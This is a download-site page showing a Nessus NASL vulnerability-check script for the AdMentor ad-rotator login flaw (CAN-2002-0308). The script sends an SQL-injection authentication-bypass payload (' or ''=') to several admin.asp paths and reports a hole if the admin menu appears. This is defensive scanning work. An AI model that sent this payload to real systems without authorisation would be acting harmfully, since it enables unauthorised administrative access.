⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 admentor_login_flaw.nasl

📁 漏洞扫描源码,可以扫描linux,windows,交换机路由器
💻 NASL
字号:
###if(description){ script_id(10880); script_bugtraq_id(4152); script_cve_id("CAN-2002-0308"); script_version("$Revision: 38 $"); name["english"] = "AdMentor Login Flaw"; script_name(english:name["english"]);  desc["english"] = "AdMentor is a totally free ad rotator script written entirely in ASP. A security vulnerability in the product allows remote attackers tocause the login administration ASP to allow them to enter withoutknowing any username or password (thus bypassing any authenticationprotection enabled for the ASP file).Solution : Contact the author for a patchSee also : http://www.securiteam.com/windowsntfocus/5DP0N1F6AW.htmlRisk factor : High"; script_description(english:desc["english"]);  summary["english"] = "AdMentor Login Flaw";  script_summary(english:summary["english"]);  script_category(ACT_GATHER_INFO);  script_copyright(english:"This script is Copyright (C) 2002 SecurITeam"); family["english"] = "CGI abuses"; script_family(english:family["english"]); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); exit(0);}# Check starts hereinclude("http_func.inc");include("http_keepalive.inc");function check(req){  host = get_host_name();  if ( ! is_cgi_installed_ka(item:req, port:port) ) return NULL;  variables = string("userid=%27+or+%27%27%3D%27&pwd=%27+or+%27%27%3D%27&B1=Submit");  req = string("POST ", req, " HTTP/1.1\r\n", "Host: ", host, ":", port, "\r\n", "Content-Type: application/x-www-form-urlencoded\r\n", "Content-Length: ", strlen(variables), "\r\n\r\n", variables);  buf = http_keepalive_send_recv(port:port, data:req);  if(buf == NULL)exit(0);  if (("Welcome" >< buf) && ("Admin interface" >< buf) && ("AdMentor Menu" >< buf))  {   	security_hole(port:port);	exit(0);  }   return(0);}port = get_http_port(default:80);if ( ! can_host_asp(port:port) ) exit(0);url = string("/admentor/admin/admin.asp?login=yes");check(req:url);url = string("/ads/admentor/admin/admin.asp?login=yes");check(req:url);foreach dir (cgi_dirs()){url = string(dir, "/admentor/admin/admin.asp?login=yes");check(req:url);}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -